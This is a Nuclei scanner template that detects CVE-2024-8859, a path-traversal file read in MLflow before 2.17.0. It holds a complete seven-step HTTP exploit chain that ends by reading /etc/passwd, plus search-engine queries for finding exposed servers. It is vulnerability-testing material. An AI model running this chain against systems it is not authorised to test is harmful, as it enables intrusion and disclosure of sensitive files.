id: CVE-2024-8859

info:
  name: Mlflow < 2.17.0 - Local File Inclusion
  author: gy741
  severity: critical
  description: |
    Mlflow before 2.17.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation could allow an attacker to read sensitive files on the server.
  remediation: |
    Upgrade Mlflow to version 2.17.0 or later to mitigate the vulnerability.
  reference:
    - https://huntr.com/bounties/2259b88b-a0c6-4c7c-b434-6aacf6056dcb
    - https://github.com/mlflow/mlflow/pull/13161
    - https://nvd.nist.gov/vuln/detail/CVE-2024-8859
  classification:
    epss-score: 0.25693
    epss-percentile: 0.96341
  metadata:
    max-request: 7
    vendor: lfprojects
    product: mlflow
    shodan-query: http.title:"mlflow"
    fofa-query:
      - title="mlflow"
      - app="mlflow"
  tags: cve2024,cve,mlflow,oss,lfi,huntr,intrusive,lfprojects,vuln

http:
  - raw:
      - |
        POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"name": "{{randstr}}", "artifact_location": "dbfs:/"}
      - |
        POST /api/2.0/mlflow/runs/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"experiment_id": "{{EXPERIMENT_ID}}"}
      - |
        POST /ajax-api/2.0/mlflow/upload-artifact?run_uuid={{RUN_ID}}&path=a?/a HTTP/1.1
        Host: {{Hostname}}

        whatever
      - |
        POST /ajax-api/2.0/mlflow/experiments/delete HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"experiment_id": "{{EXPERIMENT_ID}}"}
      - |
        POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"name": "{{randstr}}"}
      - |
        POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"name": "{{randstr}}", "source": "dbfs:/{{RUN_ID}}/artifacts/a%3f/../../../../../../../../../../../../"}
      - |
        GET /model-versions/get-artifact?name={{randstr}}&version=1&path=etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

    extractors:
      - type: json
        part: body_1
        name: EXPERIMENT_ID
        group: 1
        json:
          - '.experiment_id'
        internal: true

      - type: json
        part: body_2
        name: RUN_ID
        group: 1
        json:
          - '.run.info.run_id'
        internal: true
# digest: 4a0a00473045022100d1fb86d44600dc4c51b53b9e195098d29943ae502229a98c1d5c6b3be16949a502201db238b5556029860c350f70647f0f53814b176ce98bde484fc7fa0a7d4a7b14:922c64590222798bb761d5b6d8e72950